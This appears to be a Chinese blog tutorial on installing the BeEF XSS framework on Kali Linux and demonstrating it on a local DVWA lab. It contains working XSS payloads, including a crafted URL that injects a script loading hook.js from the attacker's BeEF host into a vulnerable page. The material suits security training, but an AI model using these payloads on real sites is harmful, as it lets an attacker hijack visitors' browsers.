1、介绍
早期版本kali默认安装,后来则需要手动安装
Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)_半个西瓜.的博客-CSDN博客_beef工具
2、安装
(1)切换root用户
sudo su- 密码也是kali
(2)更新
apt update- 这一步是有必要的,否则可能下载不完整,报错
(3)安装
apt install beef-xss- 注意不是直接的beef
- 安装过程有遇到询问是否ask,默认的是NO,手动选择YES
(4)启动
beef-xss- 首次启动,会要求输入设置密码,不能是beef。我这里设置123456
- 启动成功之后会自动打开浏览器,账户名为beef,密码即新设的123456
3、使用
(1)说明
在存在xss漏洞处,置入如下payload,127.0.0.1是指beef-xss安装的主机,即在用户浏览器执行xss时加载外部js-hook.js文件。
<script src="http://127.0.0.1:3000/hook.js"></script>(2)dvwa 反射型xss low演示
dvwa是部署在本地主机phpstudy环境中,ip:192.168.93.1
kali是vm虚拟机,192.168.93.136
在本地主机浏览器登录dvwa,设置low等级,然后访问,此时beef网页出现了请求该hook.js文件的主机
http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=%27%3E%3Cscript%20src=http://192.168.93.136:3000/hook.js%3E%3C/script%3E
4、解读
5、命令操作
beef提供快捷的命令进行攻击和利用。
绿色模块:表示模块适用当前用户,并且执行结果对用户不可见 红色模块:表示模块不适用当前用户,有些红色模块也可以执行 橙色模块:模块可用,但结果对用户可见 灰色模块:模块为在目标浏览器上测试过
